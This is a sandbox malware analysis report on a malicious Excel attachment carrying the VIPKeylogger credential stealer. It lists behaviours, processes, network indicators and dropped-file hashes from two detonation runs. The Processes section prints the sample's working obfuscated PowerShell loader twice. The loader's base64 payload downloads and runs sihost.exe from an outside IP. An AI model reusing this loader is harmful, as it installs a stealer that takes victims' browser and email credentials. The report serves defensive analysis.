Malware Analysis Report

2025-05-28 14:54

Sample ID 240821-hxm4navgqb
Target ALFATECH-4500068045.xls
SHA256 a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d
Tags
vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a4004b765b4e62bd32933c91301f783d2b864bbb45cf9ae35f0b6681078bb40d

Threat Level: Known bad

The file ALFATECH-4500068045.xls was found to be: Known bad.

Malicious Activity Summary

vipkeylogger collection credential_access defense_evasion discovery execution keylogger stealer upx

VIPKeylogger

Process spawned unexpected child process

Credentials from Password Stores: Credentials from Web Browsers

Blocklisted process makes network request

Downloads MZ/PE file

Evasion via Device Credential Deployment

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Drops file in System32 directory

Suspicious use of SetThreadContext

AutoIT Executable

Enumerates physical storage devices

Browser Information Discovery

System Location Discovery: System Language Discovery

Enumerates system info in registry

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Uses Volume Shadow Copy WMI provider

outlook_win_path

Uses Task Scheduler COM API

Checks processor information in registry

Suspicious behavior: MapViewOfSection

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

outlook_office_path

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-21 07:07

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-21 07:07

Reported

2024-08-21 07:09

Platform

win7-20240708-en

Max time kernel

117s

Max time network

120s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\mshta.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 264 set thread context of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\sihost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\sihost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2944 wrote to memory of 2188 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2944 wrote to memory of 2188 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2188 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2188 wrote to memory of 2128 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2128 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 2128 wrote to memory of 112 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 112 wrote to memory of 2912 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 112 wrote to memory of 2912 N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 2128 wrote to memory of 264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sihost.exe
PID 2128 wrote to memory of 264 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\sihost.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 264 wrote to memory of 268 N/A C:\Users\Admin\AppData\Roaming\sihost.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2958949473-3205530200-1453100116-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Processes

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/c PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

PowERsHelL -eX ByPASS -noP -W 1 -C DeVicecReDEntiAlDePLoymENt.exE ; ieX($(ieX('[sYsTEM.tEXt.eNcODIng]'+[CHAR]58+[ChAR]0X3a+'UtF8.gEtSTRing([sYsTem.CONVErt]'+[cHar]58+[cHaR]0X3A+'fromBasE64StRINg('+[cHAr]34+'JDE4WXFZOXV5djNJICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbUJlcmRFRklOaXRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVUlLRGtkUixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE5Cam1uZkUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHdklWcWcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWFVT0VYV3h4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTnFYdEZkakIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1FU1BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVkRXRpUnFrICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkMThZcVk5dXl2M0k6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS42Ni4yMzEuMjA5LzM1MC9zaWhvc3QuZXhlIiwiJEVOVjpBUFBEQVRBXHNpaG9zdC5leGUiLDAsMCk7U3RhUnQtU0xlRVAoMyk7U1RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcc2lob3N0LmV4ZSI='+[CHar]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp"

C:\Users\Admin\AppData\Roaming\sihost.exe

"C:\Users\Admin\AppData\Roaming\sihost.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Users\Admin\AppData\Roaming\sihost.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 jamp.to udp
US 172.67.188.67:443 jamp.to tcp
US 8.8.8.8:53 c.pki.goog udp
FR 216.58.214.163:80 c.pki.goog tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 172.67.188.67:443 jamp.to tcp
NL 45.66.231.209:80 45.66.231.209 tcp
NL 45.66.231.209:80 45.66.231.209 tcp
US 8.8.8.8:53 checkip.dyndns.org udp
DE 193.122.6.168:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.16.170.123:80 crl.microsoft.com tcp

Files

memory/2556-1-0x000000007232D000-0x0000000072338000-memory.dmp

memory/2556-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2944-18-0x0000000000FE0000-0x0000000000FE2000-memory.dmp

memory/2556-19-0x0000000002390000-0x0000000002392000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

MD5 971c514f84bba0785f80aa1c23edfd79
SHA1 732acea710a87530c6b08ecdf32a110d254a54c8
SHA256 f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA512 43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

MD5 5c0c586fcc0295465e226ba96427cf97
SHA1 d52cd521b3847f56dfe33c4b858b86063a33a584
SHA256 5b698c684d3e08ec24433ea3bdecc350406f9b4934d4ec5d66b68e51d2f9a08d
SHA512 e71aa78a5a62fbdd763f4b6f0f741f68567504777b2aeff429c9ae51296d2d562e671ca95b793b53f67152443806ad956b3c9f6705a4fcf2a50323f5ddd025a4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 7fb5fa1534dcf77f2125b2403b30a0ee
SHA1 365d96812a69ac0a4611ea4b70a3f306576cc3ea
SHA256 33a39e9ec2133230533a686ec43760026e014a3828c703707acbc150fe40fd6f
SHA512 a9279fd60505a1bfeef6fb07834cad0fd5be02fd405573fc1a5f59b991e9f88f5e81c32fe910f69bdc6585e71f02559895149eaf49c25b8ff955459fd60c0d2e

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

MD5 0231a37c450fd71f499a766ae7cde4c1
SHA1 f7f3c7c55ef4a628173ea34e7697f8526b083d2b
SHA256 4e0dd896a5b11132d722b155cde5f03a61807583cc413bd91e04fc2c4ccc3dcd
SHA512 6bd6f7b8ff82f52eb754ab490a03453117e67973bcb53ed7233e167a663b26578b8b4da1a907bc99b535b3cb9294b0907e054eb427a0677898ebbc1adfc4bbf6

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 183cf0f46c5d878b4da3706777d441a7
SHA1 662d0457e60699c16a3f4978c0f4d7a2fa41ee24
SHA256 54a5b037f119c7c72288e8938f3b0d1fb9be28ceee4712df639ebd1fec9bebb1
SHA512 0c79c1fdb6135dbd9845493fb8201e3a067f4ec831fdc05d7623435cc39ec492dabffa890d9626e0f3f2c575780312e502205fb94d7656e0438693a3412b4bfa

C:\Users\Admin\AppData\Local\Temp\Cab81FC.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\X761FPIN\icreamnet[1].hta

MD5 7103c506472571a74df192733c3a951f
SHA1 e33b0379480d8796cc6f076240e4bedd4ed491d3
SHA256 c71171c8f9e4481d14b506d2ae0c37ef7702e610e898bcf146c72523c86aec7f
SHA512 2f61230549b40684e797e044935bfe1fb74d969abf185087aebd2b8f9cffdefb09bef7eeb381d8ce492e877eae00131405eb961e284a0c87f76b819dafc759b5

\??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.cmdline

MD5 fa15298a795e8bfc3b0cb550e623c67c
SHA1 a33e468fb287322ac76c443884ab2ce769211277
SHA256 9ca437fe90a7d431850a3364d39cc66a981baa00ec91901b221a4a0d6f515489
SHA512 9814e53d180703a03673ca6721f52f8a6d2051362e53994992d26f745af71d5061c9e4c1d1d407afed7dc603e014b73b8df51706b9c316440a92a4e52abef29a

\??\c:\Users\Admin\AppData\Local\Temp\w_wxvdsu.0.cs

MD5 602090135e2e0d9cd49e6059ebe19206
SHA1 aff8001ee39f6d2b36cd1b74f87c22b152c55580
SHA256 b4f6cf69835c797d9964ff6ed7bd8223ade6e4c80053ee0659d2cf6d1fd4c8b9
SHA512 664b7d40c32eaa692af57d2afdc4f0235c8062b354177d490868dce23b1b91bae33ad567b8a700a9c50e66fa507a1a9404faba92bfec26c4dfa21425ea5c83e1

\??\c:\Users\Admin\AppData\Local\Temp\CSC8A26.tmp

MD5 7b62578350fbc3e85a2c8ee625ad270f
SHA1 e1454131de8f74f5d918b719903122ca29ee2fb3
SHA256 852cc899d42c51ca2c327c5775481ca7bba3e075e670794fa8964973fbebd554
SHA512 ae891dc02a7efdb525ad3c7e36cb23cf61768da2871200c58914b175bcac598c5215acafc14788bf60c3fe3289946f0c35395d435d8405df8928dd4339a7186a

C:\Users\Admin\AppData\Local\Temp\RES8A37.tmp

MD5 9fc4d43938ebb2a9c1a6a5c9e8e1b7da
SHA1 2cccc89f39e676854fa9c81b591f0c5ea154b97f
SHA256 27838d11900ed1b250a86cc776bc5edba978128c944a371065c74c00a4cbd153
SHA512 32b4fbbd96fe1b6fddd3427ec725f3cb5684fec095d4107dbd9bcfddfc5256d4f5a13879f57901299ef9ef0c0c4229158467398fc16b106c6f4515716f34890e

C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.dll

MD5 69329fad78578ff7b1c18ab40d90f650
SHA1 22be61573dba4a668eb79dcf447185d3b966678d
SHA256 2376de8780975313d031cf80e11904d5c23bc2d70701e6b59515824b6e20eee4
SHA512 227c108cb1e3e594ddb12dad2ef8b4a3a9a7b4797b495f78073ac7708bf82094409ba59b28f21d625c15117714525c701578ddf8d60ec4d440167c2c1ced1115

C:\Users\Admin\AppData\Local\Temp\w_wxvdsu.pdb

MD5 16cfde2da53cade58911abeebc95cbe8
SHA1 f0b8a9b295d92f515044a6f59e6247fca8cf6091
SHA256 3b3e179c787f21c82988759e6f801dc1091190e78d01edcff64f2382e966acf7
SHA512 4fd6cc9b4f9790a5bc9fea1fd336ff2fec82ca8f36bd2fc7cec3282c47fa24c0e6e074e906683edc61255006b4026f32579f58a68ed38f93d9ae2a92f3ebe510

C:\Users\Admin\AppData\Roaming\sihost.exe

MD5 cf7c1cb71ad11a8c4ab07ffc3afa2f67
SHA1 68c5f1c0e97237c4fff232e099353792b160df1a
SHA256 6eb12a217689847fa90ae6ac61401fe0349653808da3e4386abf01ee4f56e2f9
SHA512 997d7e6bcd9aa8ac33f6bb667edfe40efc522f47dd54284895b15736edb86052284409a3a6a9ab1c9e9066f507599a1824cf6a935849cb7346e2464c90ccb904

memory/2556-61-0x000000007232D000-0x0000000072338000-memory.dmp

memory/264-65-0x00000000008A0000-0x0000000000A2D000-memory.dmp

memory/2128-63-0x0000000006B70000-0x0000000006CFD000-memory.dmp

memory/268-78-0x0000000000400000-0x0000000000441000-memory.dmp

memory/268-79-0x0000000000400000-0x0000000000441000-memory.dmp

memory/264-81-0x00000000008A0000-0x0000000000A2D000-memory.dmp

memory/268-82-0x0000000000550000-0x00000000005B0000-memory.dmp

memory/268-83-0x00000000005C0000-0x000000000061E000-memory.dmp

memory/268-91-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-103-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-133-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-141-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-139-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-137-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-135-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-131-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-129-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-125-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-123-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-119-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-117-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-115-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-113-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-111-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-109-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-107-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-101-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-99-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-97-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-95-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-93-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-89-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-87-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-127-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-121-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-105-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-85-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/268-84-0x00000000005C0000-0x0000000000618000-memory.dmp

memory/2556-1178-0x000000007232D000-0x0000000072338000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-21 07:07

Reported

2024-08-21 07:09

Platform

win10v2004-20240802-en

Max time kernel

143s

Max time network

126s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ALFATECH-4500068045.xls"

Signatures

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process N/A C:\Windows\System32\mshta.exe C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE N/A
